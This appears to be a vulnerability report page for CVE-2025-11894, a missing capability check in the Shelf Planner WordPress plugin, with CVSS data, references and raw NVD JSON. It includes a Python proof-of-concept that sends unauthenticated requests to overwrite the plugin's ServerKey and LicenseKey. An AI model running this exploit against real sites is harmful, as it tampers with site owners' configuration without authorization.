Security Vulnerability Report
CVE-2025-11894 CVSS 5.3 MEDIUM

CVE-2025-11894

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Shelf Planner plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several REST API endpoints in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to modify several of the plugin's settings like the ServerKey and LicenseKey.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Shelf Planner plugin < 2.8.1
Shelf Planner plugin <= 2.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-11894 PoC - WordPress Shelf Planner Unauthorized Configuration Modification
# Target: WordPress site with Shelf Planner plugin <= 2.8.1
TARGET_URL = "http://target-wordpress-site.com"


def exploit_shelf_planner():
    """
    Exploit for CVE-2025-11894: Missing authorization in Shelf Planner REST API endpoints
    This PoC demonstrates how an unauthenticated attacker can modify plugin settings.
    """
    # Step 1: Identify the REST API endpoint
    # Shelf Planner plugin registers REST API routes without capability checks
    api_base = f"{TARGET_URL}/wp-json/shelf-planner/v1"

    # Step 2: Attempt to modify ServerKey setting
    # This endpoint should require authentication but doesn't
    server_key_payload = {
        "key": "server_key",
        "value": "attacker_controlled_server",
    }
    response = requests.post(
        f"{api_base}/settings",
        json=server_key_payload,
        headers={
            "Content-Type": "application/json",
            "X-WordPress-Nonce": "",  # Not required due to missing auth check
        },
    )
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")

    # Step 3: Attempt to modify LicenseKey setting
    license_key_payload = {
        "key": "license_key",
        "value": "MALICIOUS-LICENSE-KEY",
    }
    response = requests.post(
        f"{api_base}/settings",
        json=license_key_payload,
        headers={"Content-Type": "application/json"},
    )
    print(f"[*] License Key Modification Response: {response.text}")


if __name__ == "__main__":
    exploit_shelf_planner()
```

References

https://wordpress.org/plugins/shelf-planner/#developers
https://www.wordfence.com/threat-intel/vulnerabilities/id/107031b3-5071-490a-a8f7-060212b1724c?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11894",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T04:15:44.613",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Shelf Planner plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several REST API endpoints in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to modify several of the plugin's settings like the ServerKey and LicenseKey."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-862" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wordpress.org/plugins/shelf-planner/#developers",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/107031b3-5071-490a-a8f7-060212b1724c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```